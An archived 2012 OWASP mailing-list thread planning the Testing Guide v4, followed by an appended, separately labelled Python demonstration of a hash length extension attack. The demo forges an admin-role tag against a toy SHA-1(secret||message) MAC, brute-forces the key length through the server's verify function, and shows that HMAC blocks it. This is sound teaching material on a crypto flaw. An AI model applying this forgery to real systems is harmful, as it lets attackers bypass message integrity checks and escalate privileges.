[Owasp-testing] Testing Guide V4 - Start up

Ismael Rocha ismaelrocha.projetos at gmail.com
Tue Sep 4 21:39:11 UTC 2012


Hello.

I think maybe we should make a cross-reference between the ToC and the
Testing Cheat Sheet. It would help us to identify which aspects are covered
and which aren't covered in the ToC.
For example: SSO is covered in the cheatsheet and not covered in the ToC.
Also HTTP DoS.
It also can give us some ideas about the names of the sections. If anybody
did it already I can do it.

Ismael Gonçalves

https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet

https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

On Tue, Sep 4, 2012 at 6:16 PM, Simone Onofri <simone.onofri at gmail.com> wrote:

> On Tue, Sep 4, 2012 at 11:13 PM, Ismael Rocha
> <ismaelrocha.projetos at gmail.com> wrote:
> > Hello.
>
> hi ismael,
>
> > As I mentioned some days ago, I suggested improving the SSL test, maybe
> > based on Qualys SSL Labs issues and others.
> >
> > "SSL Test
> >  -> Enhance (maybe based on Qualys SSL Labs tests?)"
>
>
> +1, i also use it!
>
> > Still talking about "cryptography not used when necessary", I would say
> > that it is important to cover aspects of technologies which use the
> > ViewState concept (e.g. JSF, .NET).
>
> of course!
>
>
> > Ismael Gonçalves
> >
> >
> > On Tue, Sep 4, 2012 at 5:42 PM, Simone Onofri <simone.onofri at gmail.com>
> > wrote:
> >>
> >> hi all,
> >>
> >> I see the question is that "data encryption" covers both transmission
> >> and storage.
> >>
> >> Historically the two issues are divided. To brainstorm some stuff, also
> >> using the web application security testing checklist [1]:
> >>
> >>  - not used when necessary (e.g. for credential transportation or
> >> storage)
> >>  - algorithms
> >>    - weak/homebrew (e.g. on SSL or when developers use weak
> >> algorithms to protect data)
> >>    - wrong context (e.g. symmetric encryption for password storage)
> >>    - improper usage (e.g. hashing without salting, KDF with too few
> >> iterations)
> >>  - keys and secrets
> >>    - weak/short/guessable (e.g. also on ssl)
> >>  - entropy issues
> >>    - weak random generators
> >>    - ...
> >>
> >> ideas?
> >>
> >> s.
> >>
> >>
> >> [1]
> >> https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
> >> On Tue, Sep 4, 2012 at 9:56 PM, Juan Galiana Lara <jgaliana at owasp.org>
> >> wrote:
> >> > +1!
> >> >
> >> > I think that is really important to cover.
> >> >
> >> > I've seen a new "Testing for Data Encryption (New!)" under the data
> >> > validation section, but I would rather consider having a main section
> >> > for "Cryptography" at the same level as authentication, authorization,
> >> > data validation and so on.
> >> >
> >> > Cryptography is one of the most important topics in security and there
> >> > have been quite significant crypto vulnerabilities applied to webapps,
> >> > like the padding oracle attack technique that was applied to decrypt
> >> > HTTP cookies in several frameworks like ASP.NET, ROR and JSF two years
> >> > back. Or the one Eduardo mentions, extension attacks due to improper
> >> > or lack of use of HMAC algorithms, which is quite common.
> >> >
> >> > Actually, there are already a few sections under DV in the new table of
> >> > contents that would fit in that section:
> >> >
> >> > Testing for Data Encryption (New!)
> >> >
> >> > Application did not use encryption
> >> > Weak SSL/TLS Ciphers
> >> >
> >> > Insufficient Transport Layer Protection
> >> >
> >> > Insecure Cryptographic Storage [mainly CR Guide]
> >> >
> >> >
> >> > Thoughts?
> >> >
> >> >
> >> > --
> >> > Juan Galiana
> >> >
> >> >
> >> > On Tue, Sep 4, 2012 at 3:58 AM, Eduardo Castellanos <guayin at gmail.com>
> >> > wrote:
> >> >>
> >> >> Hello,
> >> >>
> >> >> What about a section for cryptographic attacks? Bad use of crypto
> >> >> functions in general (Hash Length Extension, etc.), or would that be
> >> >> outside the scope of the guide?
> >> >>
> >> >> Related links:
> >> >>
> >> >> https://blog.whitehatsec.com/hash-length-extension-attacks/
> >> >> https://www.owasp.org/index.php/Category:Cryptographic_Vulnerability
> >> >>
> >> >> http://blogs.msdn.com/b/ace_team/archive/2008/11/13/vulnerabilities-due-to-improper-use-of-crypto-part-1.aspx
> >> >>
> >> >>
> >> >> Eduardo Castellanos N.
> >> >>
> >> >>
> >> >>
> >> >> On Mon, Sep 3, 2012 at 8:01 PM, Robert Winkel
> >> >> <robert.winkel at saltbushgroup.com> wrote:
> >> >>>
> >> >>> I have taken the liberty of assigning myself against several of the
> >> >>> Authentication Testing test cases.  I am happy to hand those over if
> >> >>> someone is interested in being assigned to those instead.
> >> >>>
> >> >>> What happened to the Denial of Service test cases?
> >> >>>
> >> >>> Is there a template to adhere to when the writing stage begins?
> >> >>>
> >> >>> _______________________________________
> >> >>> Robert “Bull” Winkel
> >> >>> Director Saltbush Assurance
> >> >>> email: robert.winkel at saltbushgroup.com
> >> >>> http://www.linkedin.com/in/robertwinkel
> >> >>>
> >> >>>
> >> >>> -----Original Message-----
> >> >>> From: owasp-testing-bounces at lists.owasp.org
> >> >>> [mailto:owasp-testing-bounces at lists.owasp.org] On Behalf Of Matteo
> >> >>> Meucci
> >> >>> Sent: Friday, 31 August 2012 1:40 AM
> >> >>> To: owasp-testing at lists.owasp.org
> >> >>> Subject: [Owasp-testing] Testing Guide V4 - Start up
> >> >>>
> >> >>> Hi all Testing Guide contributors.
> >> >>>
> >> >>> Testing Guide v4 has been approved as Projects Reboot 2012!
> >> >>> https://www.owasp.org/index.php/Projects_Reboot_2012
> >> >>>
> >> >>> Here is the list of contributors I've collected:
> >> >>>
> >> >>> Pavol Luptak
> >> >>> Marco Morana
> >> >>> Giorgio Fedon
> >> >>> Stefano Di Paola
> >> >>> Gianrico Ingrosso
> >> >>> Giuseppe Bonfà
> >> >>> Roberto Suggi Liverani
> >> >>> Robert Smith
> >> >>> Andrew Muller
> >> >>> Robert Winkel
> >> >>> tripurari rai
> >> >>> Thomas Ryan
> >> >>> tim bertels
> >> >>> Cecil Su
> >> >>> Aung KhAnt
> >> >>> Norbert Szetei
> >> >>> michael.boman
> >> >>> Wagner Elias
> >> >>> Kevin Horvat
> >> >>> Juan Galiana Lara
> >> >>> Kenan Gursoy
> >> >>> Jason Flood
> >> >>> Javier Marcos de Prado
> >> >>> Sumit Siddharth
> >> >>> Mike Hryekewicz
> >> >>> psiinon
> >> >>> Ray Schippers
> >> >>> Raul Siles
> >> >>> Jayanta Karmakar
> >> >>> Brad Causey
> >> >>> Vicente Aguilera
> >> >>> Ismael Gonçalves
> >> >>>
> >> >>> Reviewers team:
> >> >>>
> >> >>> Paolo Perego
> >> >>> Daniel Cuthbert
> >> >>> Matthew Churcher
> >> >>> Lode Vanstechelman
> >> >>> Sebastien Gioria
> >> >>>
> >> >>>
> >> >>> Introduction and Project purpose for v4:
> >> >>> =========================================
> >> >>> The OWASP Testing Guide v3 includes a "best practice" penetration
> >> >>> testing framework which users can implement in their own organizations
> >> >>> and a "low level" penetration testing guide that describes techniques
> >> >>> for testing the most common web application and web service security
> >> >>> issues. Nowadays the Testing Guide has become the standard for
> >> >>> performing a Web Application Penetration Test, and many companies all
> >> >>> around the world have adopted it.
> >> >>> It is vital for the project to maintain an updated guide that
> >> >>> represents the state of the art for WebAppSec.
> >> >>>
> >> >>> Project Roadmap
> >> >>> =============
> >> >>>
> >> >>> - (1) 1st phase: Brainstorming and create a new table of contents
> >> >>>
> >> >>> Objective: creating a new table of contents of the OTGv4, assigning a
> >> >>> task for each contributor.
> >> >>> I created a new OWASP Testing Guide v4 table of Contents here:
> >> >>> https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
> >> >>>
> >> >>> - (2) 2nd phase: Writing
> >> >>>
> >> >>> - 20th September 2012: Start writing the articles
> >> >>> - 1st November 2012: 1st Draft
> >> >>> - 30th November: end of writing phase
> >> >>>
> >> >>> - (3) 3rd phase: Reviewing
> >> >>>
> >> >>> - 1st December 2012: Starting the review phase,
> >> >>> - 15th December 2012: Create the RC1,
> >> >>> - 31st January 2013: Release the version 4.
> >> >>>
> >> >>> Timeline November 2012 1st Draft, January 2013 Final Release
> >> >>>
> >> >>> So, let's start discussion about phase (1)!
> >> >>>
> >> >>> Thanks!
> >> >>> Mat
> >> >>>
> >> >>> --
> >> >>> Matteo Meucci
> >> >>> OWASP Testing Guide Lead
> >> >>> OWASP-Italy President
> >> >>>
> >> >>>
> >> >>> _______________________________________________
> >> >>> Owasp-testing mailing list
> >> >>> Owasp-testing at lists.owasp.org
> >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
> >> >>>
> > --
> > Ismael Gonçalves
>



-- 
Ismael Gonçalves
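The hash length extension attack that Eduardo and Juan raise in the thread above, as an added, runnable example that is not part of the original mailing-list discussion. It reimplements SHA-1 only because hashlib does not expose the internal chaining state an attacker resumes from; the key SECRET, the signed query string, and the use of the server's own verify function as an accept/reject oracle are constructed assumptions for the demonstration. The forgery works against MAC = SHA-1(secret || message) and fails against HMAC-SHA1.

```python
"""Hash length extension against MAC = SHA-1(secret || message), and why HMAC
is immune. SHA-1 is reimplemented here because hashlib will not let a caller
resume from an arbitrary internal state."""
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF
_SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)

# Constructed example key: the server knows it; the attacker only guesses its length.
SECRET = b"s3cr3t-k3y"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def _compress(state, block):
    """One SHA-1 compression step over a 64-byte block (FIPS 180-4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | (~b & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        a, b, c, d, e = (_rotl(a, 5) + f + e + k + w[i]) & _MASK, a, _rotl(b, 30), c, d
    return tuple((s + v) & _MASK for s, v in zip(state, (a, b, c, d, e)))


def sha1_padding(total_len):
    """The Merkle-Damgard padding SHA-1 appends to a message of total_len bytes."""
    return b"\x80" + b"\x00" * ((55 - total_len) % 64) + struct.pack(">Q", total_len * 8)


def sha1(data, state=_SHA1_IV, already_hashed=0):
    """SHA-1 digest of data. `state` plus `already_hashed` (a multiple of 64)
    resume hashing from a known chaining value. That is the whole weakness:
    the published digest *is* the chaining value after the last block."""
    padded = data + sha1_padding(already_hashed + len(data))
    for off in range(0, len(padded), 64):
        state = _compress(state, padded[off:off + 64])
    return struct.pack(">5I", *state)


# --- server side: the broken construction and the fixed one -----------------
def vulnerable_mac(message):
    return sha1(SECRET + message)  # H(key || msg): extendable by anyone


def vulnerable_verify(message, tag):
    return hmac.compare_digest(vulnerable_mac(message), tag)


def hmac_verify(message, tag):
    # HMAC hashes the inner digest again under the key, so the outer digest is
    # not a resumable state of any data the attacker controls.
    return hmac.compare_digest(hmac.new(SECRET, message, hashlib.sha1).digest(), tag)


# --- attacker side ----------------------------------------------------------
def length_extension(known_msg, known_tag, key_len, extension):
    """Forge a valid tag for known_msg || glue || extension without the key.
    glue is the padding the server's hash consumed right after key || known_msg."""
    glue = sha1_padding(key_len + len(known_msg))
    forged_msg = known_msg + glue + extension
    forged_tag = sha1(extension, state=struct.unpack(">5I", known_tag),
                      already_hashed=key_len + len(known_msg) + len(glue))
    return forged_msg, forged_tag


def forge_with_unknown_key_len(known_msg, known_tag, extension, oracle, max_len=64):
    """A real attacker does not know len(key): try each candidate length and let
    the server's verify function (the oracle) say which forgery it accepts."""
    for key_len in range(1, max_len + 1):
        msg, tag = length_extension(known_msg, known_tag, key_len, extension)
        if oracle(msg, tag):
            return key_len, msg, tag
    return None


def demo():
    msg = b"user=alice&role=user"  # constructed: a signed query string
    tag = vulnerable_mac(msg)      # legitimately issued to the client
    found = forge_with_unknown_key_len(msg, tag, b"&role=admin", vulnerable_verify)
    assert found is not None, "no key length up to 64 produced an accepted forgery"
    key_len, forged_msg, forged_tag = found
    return {
        "recovered_key_len": key_len,
        "vulnerable_accepts": vulnerable_verify(forged_msg, forged_tag),
        # independent confirmation with the standard library's SHA-1
        "hashlib_confirms": hashlib.sha1(SECRET + forged_msg).digest() == forged_tag,
        "hmac_accepts": hmac_verify(forged_msg, forged_tag),
        "forged_msg": forged_msg,
    }


if __name__ == "__main__":
    print(demo())
```

The forged message is `user=alice&role=user` followed by the glue padding bytes and `&role=admin`; whether that wins depends on how the application parses it (many query-string parsers keep the last value for a repeated key, and the padding bytes vanish into the previous value). The fix is the one Juan names: use HMAC, or a hash without the Merkle-Damgard structure, rather than H(secret || message).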